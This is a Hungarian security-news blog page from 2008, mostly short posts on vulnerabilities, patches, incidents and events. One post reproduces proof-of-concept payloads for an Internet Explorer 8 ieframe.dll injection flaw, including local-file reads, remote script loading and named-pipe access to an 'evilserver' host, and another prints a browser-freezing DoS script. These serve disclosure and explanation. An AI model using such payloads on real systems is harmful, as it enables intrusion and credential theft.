Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

Fertőzött USB stickek a HP-tól

2008.04.10. 09:31 | buherator | 2 komment

A SANS Internet Storm Center jelentése szerint egyes HP ProLiant szerverekkel szállított 256MB és 1GB kapacitású "floppy USB kulcsok" előre csomagolt W32.SillyFDC és W32.Fakerecy férgekkel érkeznek, melyek az eszközök csatlakoztatása után az autorun.inf fájl segítségével próbálnak meg települni. Egy normális víruskeresőnek nem lehet problémája a kórokozók elcsípésével, de bármilyen Windowst futtató, de víruskeresővel nem rendelkező  (OMG!) gép esetén, melyen az említett USB kulcsokat használták nagy eséllyel fellépett a fertőzés anélkül, hogy errőla  felhasználó bármilyen módon értesült volna. Persze egy antivírus telepítése itt is megoldja a problémát, de én inkább arra lennék kíváncsi, hogy hogyan kerültek a férgek sorozatgyártásra?

A heise-online cikke alapján.

Címkék: worm hp

ISACA találkozó - beszámoló

2008.04.09. 21:35 | buherator | 5 komment

Ebben a pillanatban értem haza az ISACA havi rendszeres - de ezúttal némileg rendhagyó - találkozójáról, melynek témája a hackerek és az IT-biztonsági szakemberek szembenállása és együttműködési lehetőségeik voltak. Vittem jegyzetfüzetet, hogy az említésre méltó dolgokat megörökítsem, de erről sajnos teljesen megfeledkeztem, ezért most kénytelen leszek a memóriámra hagyatkozni, de azért megpróbálom összeszedetten tartani a mondandómat:
Mikor összeverődött a jelenlegi és régi "bűntársakból" álló banda, természetesen rögtön elkezdtük végigvenni a lehetséges forgatókönyveket, melyek közül a két legrémisztőbb az volt, hogy hatalmas szardobálás kerekedik a "két tábor" között, valamint hogy totális unalomba fullad a műsor. Nos, örömmel mondhatom - bár nem szeretem lelőni a poént - hogy ezek közül egyik sem következett be :)
Persze a "műsor" eleinte csendesen indult, lement néhány slide, de az eddig megtört fontosabb magyar szolgáltatók bemutatásakor végre elkezdődött egyfajta "sztorizgatás", amiből lassan kezdett kialakulni a várva várt vita. Ez talán a jól célzott "Van itt valaki az XY banktól/cégtől?" vagy "Az egyszer egy igen ismert szolgáltatónál..." kezdetű hozzászólásoknak is volt köszönhető, amelyek nem csak a "mi" oldalunkról, hanem az "öltönyös" társaságtól is érkeztek!
Innentől kezdve érezhető volt, hogy egy oldalon állunk, csak egyikünk az IT-biztonság elefántjának ormányát, másikunk pedig a farkát nézi. Maga a prezentáció ettől a pillanattól tulajonképpen csak a gondolatfolyamok mederben tartására szolgált (változó hatékonysággal), mivel a kibontakozó vita során a magyar IT-biztonsági helyzetet valamint ennek viszonyát a hackerekkel nagyrészt körbejártuk.
A legnagyobb érdeklődést kiváltó témák (már amennyire részekre lehet bontani az elhangzottakat) a hacker, mint fogalom, a hackelés és munkaerőpiac igényei, valamint a hackelséhez kapcsolódó erkölcsi aggályok voltak. Ezek közül én az első témát emelném, ki, mivel az ezzel kapcsolatos hozzászólásokból világosan kiderült az, hogy a magyar emberek gondolodásából a klasszikus értelemben vett "nagygép" hacker már érthető módon kiveszett, az új generációs, nem-hivatásos fehér/szürkekalaposok fogalma viszont még nem jutott el a legszűkebb rétegeken kívülre sem! Ez nem tudom, hogy országspecifikus jelenség-e, minden esetre elszomorítónak találom a dolgot, mivel ez azt jelenti, hogy a klasszikus értelemben vett, a felfedezés szépségéért művelt hackelés feledébe merült. Pedig az egyik úr ezen mesterség művelőinek szellemiségét egyenesen az őskeresztényekéhez hasonlította, ezt figyelembe véve pedig nagy ostobaság lenne részünkről, ha hagynánk ezt a kis szubkultúrát odaveszni!
Az ISACA.hu-s hírdetmény azzal a kérdéssel zárul, hogy "Vajon ki fog többet tanulni avagy ellesni a másiktól?" Nekem meggyőződésem, hogy mindkét tábor értékes tapasztalatokkal lett gazdagabb és a találkozó elérte célját: sikerült a "törvényen kívüli" hackereknek és a "törvények közé zárt" IT-security szakembereknek megmutatni, hogy amit egy köztük álló szakadéknak hittek, az legfeljebb csak egy kisebb árok, melyen megfelelő elhatározással bárki átléphet. Előrébb tarthatna a szakma, ha több ilyen alkalom lenne, szóval hajrá!

Címkék: isaca

Levetkőztem én is

2008.04.09. 11:47 | buherator | Szólj hozzá!

Pedig majdnem elfelejtettem... Meztelenkedni jó! :)

Címkék: css naked day

A tömegbe lőttek Kínában

2008.04.06. 09:54 | buherator | 7 komment

 

Tibet tartományon kívül, de tibetiek tüntettek csütörtök este két letartóztatott szerzetes kiszabadításáért. A rendőrök a tömegbe lőttek, egy emberjogi szervezet szerint nyolc embert megöltek.

Újabb halálos rendőrségi fellépésről érkezett hír Kínából. Ezúttal is tibeti nemzetiségűek tüntettek, de a demonstráció nem az ötvenes években elfoglalt Tibet tartományban, hanem az azzal határos kínai Szecsuánban történt. A lövéseket Kína elismerte, ám a halálos áldozatokról csak egy londoni központú tibeti szervezet számolt be.

Csütörtök este több száz tibeti vonult fel egy szecsuáni városban. A civilek és szerzetesek két szerzetes kiszabadítását követelték. Őket azért tartóztatták le, mert volt náluk egy dalai lámát ábrázoló kép.


A hivatalos kínai álláspont szerint a tömeg bántalmazott egy kínai tisztségviselőt. Figyelmezető lövéseket adtak le, hogy megfékezzék az erőszakot.

Ezzel szemben a Kampány a Szabad Tibetért nevű civil szervezet helyi szemtanúkra hivatkozva azt mondta, hogy a rendőrök váratlanul nyitottak tüzet az emberekre. Az emberekkel a városháza előtt elhitették, hogy teljesítik követeléseiket, ezért elvonultak. Kiderült azonban, hogy mégse engedték el a szerzeteseket. Ekkor az emberek visszafordultak, de egy úttorlasznál rendőrsorfalba ütköztek. A kínai rendőrök lőni kezdtek és nyolc embert megöltek. A halottak között három nő és egy szerzetes is van.

Március közepén kezdődtek a tüntetések Tibet fővárosában, egy Kína-ellenes felkelés évfordulóján. A kínai hatóságok brutálisan felléptek a fegyvertelen tömeggel szemben és már százakat tartóztattak le. A tüntetések átterjedtek néhány tibetiek lakta szecsuáni városra is. A kínai hatóságok tagadják, hogy bárkit megöltek volna, szerintük randalírozás közben halt meg néhány ember az elmúlt hetekben. Tibeti források viszont több mint száz lemészárolt emberről számoltak be.


 

Címkék: szabadság tibet

ISACA találkozó - időpont és egyebek

2008.04.05. 21:59 | buherator | 6 komment

Kikerült a nem rég beharangozott találkozóval kapcsolatos hír az isaca.hu-ra. A fontosabb paraméterek:

Helyszín: PSzÁF székház (1013 Krisztina krt. 39.)
Időpont: 2008. 04. 09.-én szerdán, 16:30-tól.

Címkék: isaca

GoogleCode jelszó lenyúlása

2008.04.04. 21:42 | buherator | Szólj hozzá!

Billy Rios legújabb munkája a GoogleCode egy igen kellemetlen hiányosságára hívta fel a figyelmet. A GoogleCode egy SourceForge-hoz hasonló projekt-hoszting szolgáltatás nyílt forráskódú alkalmazások számára verziókezeléssel, hibajelentő felülettel stb. A hibajelentésekhez szinte bármilyen típusú fájl csatolható, hogy az esetleges core dumpokat, képernyőképeket és még ki tudja mi mindent könnyedén el lehessen juttatni a fejlesztőkhöz.
Billy egy speciális .jar fájlt töltött fel az egyik hibajelentése mellé. Ez a fájl bárki számára elérhető és a code.google.com domainen fut, ergo a same-origin policy is ezen a tartományon lesz értelmezve, ha sikerül lefuttatni a csomagban található Java kódot*.
Azért van szükség a kód becsomagolására, mert a JVM végez némi átalakítást az osztályok nevein mielőtt lekéri azokat, ezért a hosszú URL-t tartalmazó elérési út könnyen elromlik, az aapplet tag rchive attributumát azonban ez a kellemetlenség nem érinti, a megfelelő osztály pedig a code attributummal kiválasztható.
Ezek után nincs más dolgunk mint a GoogleCode-ba bejelentkezett felhasználót egy megfelelő oldalra irányítani, ahol is appletként betöltjük a JAR fájlt, ami átcsúszva a same-origin policyn szépen kiolvassa az összes érdekes adatot a code.google.com-ról:

PoC

Ez egyszerűen szép! :)

* Valakinek eszébe juthat, hogy ugyanezt egy egyszerű HTML oldallal is meg lehet csinálni, de az a baj, hogy a GoogleCode a feltöltött fájlokat olyan HTTP fejlécekkel küldi el, hogy azok nem renderelődnek a böngészőben, a JVM ellenben magasről tesz ezekre a fejlécekre...

Címkék: google java bug

Kritikus hibák a Cisco termékeiben

2008.04.04. 21:06 | buherator | Szólj hozzá!

Távoli kódfuttatásra vagy DoS előidézésére alkalmas hibákat fedeztek fel a Cisco Unified Communications termékcsaládjában. A hibák a 4040-es TCP portra küldött speciális csomagok segítségével használható ki, autentikációs vagy felhasználói közreműködést nem igényel, ezért különösen veszélyes! A következő termékek érintettek:

  • Cisco Unified Communications Manager (CUCM) 5.x és 6.x
  • Cisco Unified Communications Manager Business Edition
  • Cisco Unified Presence 1.x és 6.x
  • Cisco Emergency Responder 2.x
  • Cisco Mobility Manager 2.x
A gyártó által kiadott frissítések orvosolják a problémát, ezen kívül megjelent egy útmutató arról, hogy hogyan mérsékelhető a sebezhetőségből adódó kockázat, illetve hogy ismerhetők fel a hiba kihasználására irányuló kísérletek.

Címkék: bug cisco

Apple - Microsoft 11:8

2008.04.04. 15:17 | buherator | Szólj hozzá!

Legalábbis ami a közelmúlt és -jövő hibajavításait illeti:

Az Apple 11 hibát foltozott be a QuickTime legfrissebb biztonsági frissítésével, amivel a lejátszó a 7.4.5-ös verzióra emelkedik. A hibák közül kilenc alkalmas arra, hogy speciális médiafájlok segítségével különböző kártevőkkel fertőzzük meg a felhasználók gépét.

A Microsoft 8 hibajavítást tervez kiadni a jövő héten esedékes frissítőkedden. Ezek közül öt hiba kritikus, melyek közül kettő eddig először a februárban megjelent Windows Server 2008-at is érinti.

Frissítsetek!

Címkék: windows patch quicktime

Negatív CAPTCHA

2008.04.04. 13:04 | buherator | 7 komment

Heiko Webers blogján akadtam rá Damien Katz posztjára a negatív CAPTCHA-król. Ugyebár senki sem szeret viagrareklámmal teletömött blogokat, fórumokat olvasgatni, hát még üzemeltetni, de elmondhatjuk, hogy a végtelenül összekuszált, esetleg izgő-mozgó-vibráló képek megfejtése sem tartozik kedvenc elfoglaltságaink közé. És akkor még nem is beszéltem pl. a gyengénlátókról, vagy más fogyatékkal élőkről (itt ha nem fogalmaztam korrekten javítsatok ki légyszi!), akiknek minden bizonnyal komoly problémát jelenthet akár egy rendesen kivitelezett Turing teszt megoldása is.
A negatív CAPTCHA lényege az, hogy nem arra kényszeríti rá pl egy blog látogatóit, hogy bebizonyítsák azt hogy hús-vér emberek, hanem a robotokat veszi rá, hogy bebizonyítsák: nem azok! Tulajdonképpen egyfajta "mézesbödönről", honeypotról van szó: a védendő odlal tulajdonosa felvesz egy szövegmezőt minden űrlapjához, amit pl. CSS vagy JavaScript segítségével eltűntet a látogatók szeme elől. Csakhogy a crawlerek nem az oldal összképét, hanem annak forráskódját látják, ráadásul általában elég butuskák is szegények: mohón kitöltenek minden lehetséges mezőt a szemetükkel. Az embernek tehát nincs más dolga, mint kiszűrni azokat a kéréseket, amelyekben a felvett plusz mező ki van töltve, hiszen a valódi emberek általában nem foglalkoznak a nem látható mezők kitöltésével (tisztelet a kivételnek ;)).
Természetesen a módszer egyszerűen legyőzhető mondjuk úgy, hogy megtanítjuk a robotoknak, hogy milyen mezőket ne töltsenek ki, de ez csak oldal-specifikus spambotok esetén működik hatékonyan, általános célú programoknál igen bonyolult algoritmusokat kell alkalmazni a csapdák felismerésére. A negatív CAPTCHA-k tehát nem jelentenek univerzális megoldást a spamproblémára, de kellő megfontolás után az alkalmazása jelentősen megnövelheti egy oldal látogatóinak komforterzetét.

Címkék: spam captcha

Több mint 100 hiba a legnagyobb VoIP gyártók termékeiben

2008.04.04. 12:25 | buherator | Szólj hozzá!

A VoIPShield Laboratories csapata több mint száz sebezhetőséget fedezett fel különböző gyártók VoIP termékeiben. A vizsgálat első körben az Észak-Amerikában legnépszerűbb cégek, az Avaya, a Cisco és a Nortel megoldásaira koncentrált. A feltárt hibák között van szolgáltatás-megtagadást okozó, kódfuttatást lehetővé tévő és információszivárgást előidéző sebezhetőség is, melyek segítségével megbénítható egy vallalat telefonszolgáltatása, lehallgathatóak és meghamisíthatóak a felhasználók beszélgetései.
A VoIPShield közleményében kiemelte, hogy a VoIP rendszerek elleni támadások alacsony száma miatt a felelős beosztásban dolgozó IT-biztonsági szakemberek sokszor elhanyagolják a VoIP rendszerek megfelelő biztosítását, pedig a hasonló rendszerek elterjedésével a rájuk irányuló támadások intenzitása is meg fog nőni.
A biztonsági cég jelenleg az érintett cégekkel együttműködve dolgozik a hibák kijavításán. Honlapjukon a felfedezett sebezhetőségek közül eddig 44-et tettek közzé. A későbbiekben valószínűleg kiterjesztik a kutatást más gyártók termékeire is.

Címkék: voip hírek cisco avaya nortel

IE8 ieframe sebezhetőségek

2008.04.03. 13:19 | buherator | 5 komment

Ronald még mindig Internet Explorert hackel:

Bevezető

Az előző PoC-nél, ahol az internet Explorer elleni perzisztens Dos Támadást mutattam meg feltűnt, hogy az ieframe.dll egy eddig számomra ismeretlen htm fájlra hivatkozott. Ennek a neve acr_error.htm, ez jeleníti meg a hibaablakot, ha nem sikerült visszaállítani egy ablakot az összeomlásból. Az acr_screen átveszi a meghibásodott ablak URI-ját és visszaechozza az ieframe.dll HTML-jébe, ami a system32-ben találhatóA beírt URI [természetesen] nincs rendesen megszűrve, ezért az Internet Explorer és az azt futtató operációs rendsze helyi és távoli példányai ellen is több támadás kivitelezhető. A minimum ezek közül a cross-site scripting, lokálisan futtatva. Továbbá a CSRF is fennáll, a legfigyelemreméltóbb azonban az elnevezett csővezetékek [named pipes - ezeknek van szép magyar neve csak nem jut eszembe...] megtámadása. Az összes anyag teszteve lett IE8 alatt és emulált IE7 alatt is, vizsgálataim alapján úgy tűnik, mindkét változat sebezhető. Ezek a felfedezések rengeteg fenyegetést jelentenek, túl sokat ahhoz, hogy mindegyiket részletezzük. A named pipe-okkal kapcsolatos esetek hatalmas veszélyt jelentenek egy intranetre. Ma csak a felületi támadásokat és a potenciális támadási módokat tárgyalom, és azt, hogy ezek miért jelentenek veszélyt.

HTML beszúrása

HTML injektálható az ieframe.dll-be a res:// sémán keresztül. A helyi acr_error.htm a kettőskereszt utáni adatra figyel. A res://ieframe.dll/acr.js helyen megtalálható acr.js JavaScript fájl futtatja és jeleníti meg a kapott kódot. Ez bármilyen HTMl beszúrását lehetővé teszi. Az első ábrán látható, ahogy egy <h1></h1> taget szúrok be az URI-ba:


Fejlesztői eszközök

Az IE egy új lehetősggel rendelkezik, melynek neve Fejlesztői Eszközök [Developer Tools], ami oylasmi mint afirebug kiterjesztés a Mozillához, amit a forráskódok analizálásához lehet használni. Ez hatalmas segítség volt annak kiderítésében, hogy mi is történik, mivel a paraméter fuzzingot másként nem lehetett volna nyomonkövetni, mivel a JavaScript kód dinamikusan írja be a paraméteradatokat. A második ábra mutatja fejlesztői eszközt, a helytakarékosság érdekében lekeskenyítve a fennti injektált kódra:



Egy egyszerű helyi "deface"-t is véghez vihetünk egy külső helyre mutató iframe beillesztésével, ezzel spoofing és phising jellegű támadásokat ugyanúgy kivitelezhetünk, mint XSS-t vagy CSRF-t a felhasználó rendszerável szemben:

res://ieframe.dll/acr_error.htm#<iframe/src="http://0x000000.com/"/
width="1024"/height="1000"></iframe>,<h1>foo</h1>



Az ieframe.dll felhasználsával szinte bármilyen fájlt megszerezhetünk és megpróbálhatunk futtatni. Ez XSS-hez vagy helyi fájlok futtatásához vezethet. Ennek kihasználásához nem szabad szóközöket használnunk, mivel ezek ugyebár %20-ra cserélődnek. Perjel használata esetén azonban az IE és a Gecko motor ezeket szóközökké alakítja. Ez lehetővé teszi az src attributum felhasználását egy iframe és kép tag vagy távoli JavaScript esetén.

Helyi fájlok megszerzése

res://ieframe.dll/acr_error.htm#<iframe/src=''/ onload='javascript:document.write("<iframe/src=\"file://localhost/test.txt\">
</iframe>")'></iframe>,foo


Script src használatával

res://ieframe.dll/acr_error.htm#<iframe/src=''/ onload='javascript:document.write("<script/src=http://www.0x000000.com/>
</script>")'></iframe>,foo


Az elnevezett csővezetékek kihasználása

Az elnevezett csővezeték [named pipe] egy névvel rendelkező, egyirányú vagy duplex csővezeték a pipe szerver és egy vagy több kliens között kommunikációra, ami egy külön csatornát biztosít a kliens-szerver kommunikációra. Bármilyen folyamat lehet szerver vagy kliens, lehetővé téve ezzel a peer-to-peer kommunikációt. Az elnevezett csővezetékek lehetővé teszik a kommunikációt egy számítógép különböző folyamatai, vagy különböző számító gépek folyamatai között is. Ha egy szerver szolgáltatás fut, minden nevesített csővezeték elérhető távolról.

A kihasználás módja ismert, de sokak számára még mindig nehezen érthető. A Microsoft korlátozza a teljes hozzáférést, mivel az nem várt viselkedést okozhat. Megpróbálták a file:// és res:// sémák számára megtiltani a hozzáférést, de ahogy azt be fogom mutatni, az új felfedezésünk segítségével még mindig hozzáférhető. Ez azt mutatja, hogy a Microsoft még mindig a win32 shelljétől függ, egyébként ez nem lenne lehetséges. Afenyegetettségek: Pipe(d) felhasználó megszemélyesítés, NTML(SMB) információk eltulajdonítása és NTML válasz támadás (NTML reply attack), és a szokásos CSRF és XSS.

\\ServerName\\pipe\\PipeName

Ahol a ServerName egy távoli számítógép neve, vagy egy pont, a helyi gép kijelöléséhez.A csővezeték nevét specivikáló PipeName bármilyen karaktert tartalmazhat a backslash-t ("visszaper") kivéve, ideértve a számokat és speciális karaktereket. A PipeName maximum 265 karakter hosszu lehet, és nem különbözteti meg a kis- és nagybetűket. A pipe szerver nem tud csővezetéket létrhozni távol gépen, ezért a CreateNamedPipe esetében pont kell legyen a ServerName:

\\.\pipe\PipeName

Biztonsági okokból nem lenne szabad hozzáférni egy csővezetékhez sem a res:// sem a file:// sémán keresztül. Ez azt jelenti, hogy ha hozzá tudunk férni, vagy az áldozatnak segítünk hozzáférni CSRF-fel, az rengeteg különböző veszélyt hordoz magában [1].

file:///\\evilserver\pipe\exploit

file:///\\localhost\pipe\exploit


Csatlakozás egy csővezetékhez res:// és file:// használatával

res://ieframe.dll/acr_error.htm#<iframe/src=''/
onload='javascript:document.location="file://..\\ServerName\\pipe\\PipeName"'>
</iframe>,foo

Az feloldás után:

\\ServerName\\pipe\\PipeName



Konklúzió

Úgy tűnik, hogy a Microsoft még mindig ugyanazokat a hibákat követi el. A res:/6 hackelés veszélyes, és már jóval előttem is csinálták, a jövőben mérsékelni kellene ezeket a lehetőségeket. A Microsoft értesült a problémáról.

[1] További referencia az elnevezett csővezetékekről- http://www.514.es/download/Win32.Design.Flaws.pdf

Címkék: internet explorer csrf xss phishing spoofing named pipe ntml

Epilepsziás roham

2008.04.01. 20:18 | buherator | 6 komment

Nem tudom van-e ennél lejjebb: közvetett bizonyítékok arra utalnak, hogy a Szcientológiai Egyház megtámadásáról ismertté vált Anonymous csapat kezdett azzal szórakozni, hogy epilepsziás betegeknek  tömegesen villódzó Flash animációkat küldtek e-mailen, majd az Epilepszia Alapítvány fórumának hibáját kihasználva hasonló tartalmú üzeneteket hagytak azon. A támadás nyomán többen rohamot kaptak, valószínűleg ez volt az első számítógépek elleni támadás, ami a felhasználóknak közvetlen fizikai sérülést okozott. Az oldalt lekapcsolták, hogy kigyomlálják a veszélyes posztokat és hogy javítsanak a védelmen.
A fórumon elhelyezett linkek egy része a szintén az Anonymous csapat feketelistáján szereplő EBaumsWorld.com-ra irányított*. Ez az oldal arról ismert hogy engedély nélkül szerzett vicces anyagokat tesz közzé a saját logójával ellátva. Bár úgy tűnik ez a portál is megdőlt - jelenleg a felhasználói címsorban a "Hello, Administrator" felirat olvasható, az admin panere belépve pedig olyan beállítási lehetőségekkel találkozunk, hogy "Mit lopjunk el ma?" vagy akár a site logóját is lecserélhetjük - valószínűleg csak áprilisi tréfáról van szó.

* ebben én sem látom a logikát, de a Wired ezt írja, vagy nekem kéne még pár nyelvleckét vennem, esetleg többet aludnom...Arról is szó van, hogy a 7chan.org elleni támadás is szóba került a fórumon, ami viszont az Anonymous "erődítménye". Ezek alapján én inkább azt tartanám valószínűnek, hogy egy ellenérdekelt banda próbál rossz fényt vetni az Anonymousra. Lehet hogy újabb hacker-háborúnak leszünk szemtanúi?

A linkért egyébként köszi B$H-nak!

Címkék: incidens epilepszia anonymous

Légy Te a belügyminiszter!

2008.03.31. 14:27 | buherator | 6 komment

A Chaos Computer Club magazinjának, a Datenschleudernek legújabb számában a hackercsapat közzétette Wolfgang Schäuble belügyminiszter ujjlenyomatát, valamint egy speciális "matricát" is, melynek segítségével megtestesíthetjük a politikust a biometrikus azonosítások során, pl. az Egyesült Államokba történő belépéskor, a Heathrow repülőtérre történő megérkezéskor, vagy akár amikor a helyi áruházban a söröket válogatjuk :) Az akció célja a biometrikus adatok szélesedő használata - pl. az elektronikus útlevelekhez illetve egészségbiztosítási kártyákhoz történő  csatolás - elleni tiltakozás.
A biometrikus adatok ilyen módon történő felhasználása ugyanis komolyan veszélyeztetheti az emberek magánszféráját és biztonságát, ráadásul a Németországban bevezetni kívánt azonosító rendszerek üzembehelyezését folyamatos bakik kisérik.
A csapat az ujjlenyomatot egy "szimpatizáns" útján szerezte, aki elcsent egy Schäuble által korábban használt poharat egy konferenciáról. A klub tagjai további politikusok ujjlenyomataira is igény tartanának, ezért a Datenschleuderben egy külön útmutatót készítettek, melynek segítségével rögzíthetőek a különböző tárgyakon talált minták.

Címkék: privacy ccc

Megtörték a Hacker Webzine-t?

2008.03.31. 12:17 | buherator | 2 komment

Nézem a naptárat, de még nicns április 1... A 0x000000.com-on jelenleg egy jól összezavart JavaScript kód figyel, ami egyrészt a google-signature.com-on elhelyezett scriptre (A whois szerint a domain bejegyzője a bbinary@yandex.ru-n érhető el...) másrészt egy http://url/ kezdetű címre mutat, amit őszintén szólva egyelőre nem nagyon értek, bár csak pár perce vettem észre a turpisságot. A kérdéses URL-re tehát mindenki csak saját felelősségére kattintson, ha fejlemény van jelentkezem!

Frissítés: Valószínűleg a tárhelyszolgáltató adta meg magát a ruszkiknak és a virtuális szerverek is bedőltek, de most már úgy tűnik helyreállt a dolog

Címkék: incidens the hacker webzine

IE8 perzisztens DoS

2008.03.30. 17:18 | buherator | Szólj hozzá!

A legutóbbi áttekintés után Ronald nekiállt az XDomainRequestek hackelésének, és rövid úton sikerrel is járt. A böngésző egy "prototype hijackingre" (prototípus csáklyázás?) tett kísérlet után megfagy, majd az operációs rendszer (Windows) megpróbálja helyreállítani a munkamenetet, aminek újabb fagyás a vége, stb. Végül a gép újraindítása segít a helyzeten. A PoC így néz ki:

<script>

// trying prototype hijacking here.

xdr = XDomainRequest;

xdr = function() {

return new XDomainRequest();

}

ping = 'hello';

xdr = new XDomainRequest();

xdr.open("POST", "http://cnn.com");

xdr.send(ping);

</script>

Olcsó húsnak híg a leve - AES-128 helyett XOR

2008.03.29. 11:38 | buherator | 4 komment

A március 15-i CRYPTOGRAM-ban akadtam a következő cikkre:

Olcsó, új generációs merevlemezdokkok hardveres titkosítást és RFID alapú azonosítást igérnek. A reklámok 128-bites AES titkosításról szólnak, de azt nem kötik az orrunkra, hogy hogyan használják az algoritmust.

A német Drecom által gyártott 2.5 inch-es Easy Nova Data Box PRO-25UE RFID vincseszterdoboz specifikációja igéretesnek tűnik: hardveres adattitkosítás, akár kulcstartón is hordozható RFID chippel történő azonosítás és opcionális 160 vagy 250 GB-os kapacitás. Az RFID chipet a doboz mellé helyezve az integrált Innmax IM7206-os kriptovezérlő megnyitja a lemez tartalmát a csatlakoztatott számítógép előtt. A dolog ugyanúgy működik Linux és Mac OS X alatt is mint Windows-on, nincs szükség speciális driverekre.

Címkék: rfid kriptográfia

Trágár levelek tömege startolt Gyurcsány e-mail címéről

2008.03.28. 21:38 | buherator | 10 komment

 Index:

Mocskos szavakkal dúsított levelek sokaságát ontja miniszterelnök országgyűlési email-fiókja. A ferenc.gyurcsany@parlament.hu címről érkező, többek között a "basszátok meg" és a kurva ország" kifejezésekkel fűszerezett levelek természetesen hamisítványok, feladójuk nem a miniszterelnök. Daróczi Dávid kormányszóvivő szerint még kutatják, hogy valaki az informatikai rendszerbe hatolt be, netán más trükkel írogat a miniszterelnök nevében.


Mindenestre egy ilyen üzenet előállításához nem kell túl nagy technikai tudás, egy sima levelezőprogramban is szabadon beállítható a feladó. Különböző, ingyen hozzáférhető programnyelvekben is létezik egy mail függvény, amelyben szabadon beállítható a feladó címe, illetve a rendszer úgy kódolható, hogy pillanatok alatt több ezer üzenetet képes küldeni*.


Bruhaha** :) A parlament.hu-s programozók/rendszergizdák értik a dolgukat, biztos megtalálják a gazfickókat!

Update: 10 perc alatt 3 súlyos hibát találtam, lehet hogy az lenne a legcélszerűbb, ha fognák és kihúznák a vasat a konnektorból...

*Azért ehhez nem árt egy nyitott SMTP relay

** Ez egy politikailag semleges bruhaha

Címkék: bug parlament email spoofing

Kínai hackerek a rács mögött

2008.03.28. 13:07 | buherator | Szólj hozzá!

Kissé álszent ítélet született három kínai hacker ügyében, akik spyware-ek segítségével szerzett banki adatok felhasználásával több mint 100.000 jent (kb. 2.3 millió forint) emeltek le áldozataik számláiról. Chen Feng, Yu Li és Zhang Wei hat és féltől nyolc évig terjedő szabadságvesztést, valamint 40.000-60.000 jen pénzbüntetést kaptak, ami az egyik legkomolyabb büntetés a hasonló esetek történetében. A hatóságok  ezzel a lépéssel minden bizonnyal azt próbálják üzenni a többi országnak, hogy Kína betartatja, tehát be is tartja az internetes világ szabályait. Engem - bár a gazfickók megbüntetésével egyetértek - nem sikerült meggyőzniük.

Címkék: kína hírek spyware

Linkcsokor

2008.03.28. 12:20 | buherator | Szólj hozzá!

Mindig kihívást jelent lépésttartani a HUP-pal, most ők nyertek:
Idén két perc kellett a MacBook (Air) feltöréséhez
Frissítés: Az Ubuntu maradt állva a PWN to OWN versenyen
Kritikus hibák a nyílt forrású médialejátszókban

Valamint megjelent a worldshots.hu-n egy érdekes kis irodalmi/kulturális összefoglaló:
Hackeriáda az OIK-ban

Címkék: vista kultúra ubuntu vlc macbook air pwn to own mplayer

BlackHat Europe

2008.03.27. 13:15 | buherator | 1 komment

Elkezdődött a BlackHat konferenciasorozat európai rendezvénye. Sandro Gauci a Twitteren élő közvetítést ad, én pedig biztos vagyok benne, hogy mire eljutnak idáig az Amszterdamban elhangzottak legérdekesebb részletei, el fog kopni a billentyűzetem :)

Címkék: blackhat

Kritikus Safari sebezhetőségek

2008.03.27. 13:07 | buherator | Szólj hozzá!

Juan Pablo Lopez Yacubian két darab, a Secunia által "Highly critical" osztályba sorolt hibát fedezett fel a Safari 3.1 Windowsos változatában, de más változatok is érintettek lehetnek. Az első hiba címsorhamisítást tesz lehetővé, azaz létrehozhatók olyan oldalak, melyek megnyitásakor a valódi URL helyett egy hamisított cím jelenik meg a böngésző címsorában, ez pedig ideális feltételt teremt egy adathalász akció kivitelezéséhez. PoC itt van.
A második hiba távoli kódfuttatást tehet lehetővé, mivel a Safari letöltéseknél nem kezeli megfelelően a szokásosnál hosszabb fájlneveket. Bár a Secunia szakembereink még nem sikerült a hibára működő exploitot készíteniük, ajánlott minden Safari felhasználónak elkerülni a megbízhatatlan weboldalakat, az Apple ugyanis még nem reagált a felfedezésekre.

Címkék: safari bug

ISACA találkozó

2008.03.27. 12:04 | buherator | Szólj hozzá!

Április 9-én, szerda délután a PSZÁF székházban kerül megrendezésre a CISA és CISM tagok rendszeres havi találkozója, melynek mostani témája a hackerek és az IT-biztonsági szakemberek kapcsolatai, ellentétei és együttműködési lehetőségei lesznek. A felvezető előadást a hacker szakma egy jeles képviselője tartja. A rendezvény bárki számára ingyenesen látogatható, jó lenne, ha minél többen képviselnénk a "nem hivatalos" irányzatot. Ezért aki úgy érzi, hogy hozzá tud és akar szólni a fennti témához, annak ott a helye a találkozón!

További információk hamarosan az isaca.hu-n lesznek elérhetők.

Rycon.hu

2008.03.27. 11:44 | buherator | Szólj hozzá!

EarthQuake pajtással már rég óta dolgozunk együtt kisebb-nagyobb "projekteken" (ha értitek mire gondolok ;). Most ő is úgy döntött, hogy megosztja a világgal amilye van: elindult a rycon.hu! Bár az oldal még korához méltóan soványka, az IT-Security rész azért tartogat néhány finomságot, melyek közül én a John the Ripper MySQL moduljának továbbfejlesztett változatát emelném ki, ami a mérések alapján 10x olyan gyors mint a régebbi változat! Reméljük még sok hasonlót látunk, nézegessétek az oldalt szorgalmasan!

Címkék: mysql hacksite jelszótörés john the ripper

Még mindig a Scotland Yard...

2008.03.26. 12:15 | buherator | Szólj hozzá!

Az előző sajnálatos incidens után a Scotland Yardon most attól tartanak, hogy a támadók hozzáférhettek néhány olyan adatbázisszerverhez is, amely több száz kolléga személyes adatait tartalmazta. Ezek az információk felbecsülhetetlen értékkel bírhatnak a feketepiacon, érthető tehát az aggodalom. Az viszont kevésbé, hogy miért nem bírták kijavítani a Ronald
által egy hónapja felfedezett SQL injection hibát...

Címkék: sql injection

Blog.hu XSS

2008.03.24. 10:19 | buherator | 4 komment

